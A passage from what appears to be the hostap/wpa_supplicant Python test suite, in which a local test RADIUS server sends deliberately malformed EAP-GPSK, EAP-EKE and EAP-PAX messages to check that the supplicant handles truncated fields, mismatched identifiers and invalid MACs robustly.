msg += struct.pack(">8L", 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBHB8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1, ord('A'),
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server (same length)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[15:47]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing len(PD_Payload_Block)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated PD_Payload_Block")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Incorrect MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3 + 16,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB4L",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123,
0, 0, 0, 0)
return msg
return None
srv = start_radius_server(gpsk_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 27):
if i == 12:
pw = "short"
else:
pw = "abcdefghijklmnop0123456789abcdef"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="GPSK", identity="user", password=pw,
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_EKE_ID = 1
EAP_EKE_COMMIT = 2
EAP_EKE_CONFIRM = 3
EAP_EKE_FAILURE = 4
def test_eap_proto_eke(dev, apdev):
"""EAP-EKE protocol tests"""
def eke_handler(ctx, req):
logger.info("eke_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_EKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown exchange")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No NumProposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: NumProposals=0 in EAP-EKE-ID/Request")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Proposals list in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
2, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported proposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
4, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IDType/Identity in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B4B",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 5 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
5, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0,
3, 1, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Failure/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_FAILURE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid PNonce_PS and Auth_S values in EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB4L8L5L5L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 2 * 16 + 20 + 20,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(eke_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 14):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
EAP_PAX_OP_STD_1 = 0x01
EAP_PAX_OP_STD_2 = 0x02
EAP_PAX_OP_STD_3 = 0x03
EAP_PAX_OP_SEC_1 = 0x11
EAP_PAX_OP_SEC_2 = 0x12
EAP_PAX_OP_SEC_3 = 0x13
EAP_PAX_OP_SEC_4 = 0x14
EAP_PAX_OP_SEC_5 = 0x15
EAP_PAX_OP_ACK = 0x21
EAP_PAX_FLAGS_MF = 0x01
EAP_PAX_FLAGS_CE = 0x02
EAP_PAX_FLAGS_AI = 0x04
EAP_PAX_MAC_HMAC_SHA1_128 = 0x01
EAP_PAX_HMAC_SHA256_128 = 0x02
EAP_PAX_DH_GROUP_NONE = 0x00
EAP_PAX_DH_GROUP_2048_MODP = 0x01
EAP_PAX_DH_GROUP_3072_MODP = 0x02
EAP_PAX_DH_GROUP_NIST_ECC_P_256 = 0x03
EAP_PAX_PUBLIC_KEY_NONE = 0x00
EAP_PAX_PUBLIC_KEY_RSAES_OAEP = 0x01
EAP_PAX_PUBLIC_KEY_RSA_PKCS1_V1_5 = 0x02
EAP_PAX_PUBLIC_KEY_EL_GAMAL_NIST_ECC = 0x03
EAP_PAX_ADE_VENDOR_SPECIFIC = 0x01
EAP_PAX_ADE_CLIENT_CHANNEL_BINDING = 0x02
EAP_PAX_ADE_SERVER_CHANNEL_BINDING = 0x03
def test_eap_proto_pax(dev, apdev):
"""EAP-PAX protocol tests"""
def pax_std_1(ctx):
logger.info("Test: STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x16, 0xc9, 0x08, 0x9d, 0x98, 0xa5, 0x6e, 0x1f,
0xf0, 0xac, 0xcf, 0xc4, 0x66, 0xcd, 0x2d, 0xbf)
def pax_handler(ctx, req):
logger.info("pax_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Minimum length payload")
return struct.pack(">BBHB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 16,
EAP_TYPE_PAX,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported MAC ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, 255, EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported DH Group ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
255, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported Public Key ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, 255,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: More fragments")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_MF,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV in short frame")
return struct.pack(">BBHBBBBBB3L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 12,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - unsupported op_code")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
255, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x90, 0x78, 0x97, 0x38, 0x29, 0x94, 0x32, 0xd4,
0x81, 0x27, 0xe0, 0xf6, 0x3b, 0x0d, 0xb2, 0xb2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - CE flag in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x9c, 0x98, 0xb4, 0x0b, 0x94, 0x90, 0xde, 0x88,
0xb7, 0x72, 0x63, 0x44, 0x1d, 0xe3, 0x7c, 0x5c)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - too short STD-1 payload")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0xda, 0xab, 0x2c, 0xe7, 0x84, 0x41, 0xb5, 0x5c,
0xee, 0xcf, 0x62, 0x03, 0xc5, 0x69, 0xcb, 0xf4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - incorrect A length in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0xc4, 0xb0, 0x81, 0xe4, 0x6c, 0x8c, 0x20, 0x23,
0x60, 0x46, 0x89, 0xea, 0x94, 0x60, 0xf3, 0x2a)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - extra data in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8LB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 1 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
1,
0x61, 0x49, 0x65, 0x37, 0x21, 0xe8, 0xd8, 0xbf,
0xf3, 0x02, 0x01, 0xe5, 0x42, 0x51, 0xd3, 0x34)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-1")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xe5, 0x1d, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MAC ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_HMAC_SHA256_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x00, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: DH Group ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_2048_MODP,
EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x01, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Public Key ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_RSAES_OAEP,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x02, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-3")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x47, 0xbb, 0xc0, 0xf9, 0xb9, 0x69, 0xf5, 0xcb,
0x3a, 0xe8, 0xe7, 0xd6, 0x80, 0x28, 0xf2, 0x59)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
# TODO: MAC calculation; for now, this gets dropped due to incorrect
# ICV
logger.info("Test: STD-3 with CE flag")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
